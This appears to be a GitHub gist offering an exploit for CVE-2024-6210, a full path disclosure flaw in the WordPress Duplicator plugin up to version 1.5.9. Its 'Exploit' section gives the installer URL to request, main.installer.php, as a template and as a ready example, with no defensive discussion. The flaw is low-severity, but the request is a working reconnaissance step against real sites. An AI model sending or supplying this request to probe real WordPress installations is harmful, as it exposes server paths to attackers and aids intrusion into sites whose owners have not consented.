Skip to content

Instantly share code, notes, and snippets.

View h0ffy's full-sized avatar
:octocat:
Reversing, Coding or Exploiting...

h0ffy h0ffy

:octocat:
Reversing, Coding or Exploiting...
8 followers · 13 following
View GitHub Profile
@h0ffy
h0ffy / WordPress_Exploit_CVE-2024-6210_Full_Path_Disclosured.md
Last active February 9, 2026 17:15

WordPress Exploit CVE-2024-6210 Full Path Disclosured

Vulnerability

Duplicator <= 1.5.9 - Full Path Disclosure (CVE-2024-6210)

Exploit

https://$URL/wp-content/plugins/duplicator/installer/dup-installer/main.installer.php
https://example.com/wp-content/plugins/duplicator/installer/dup-installer/main.installer.php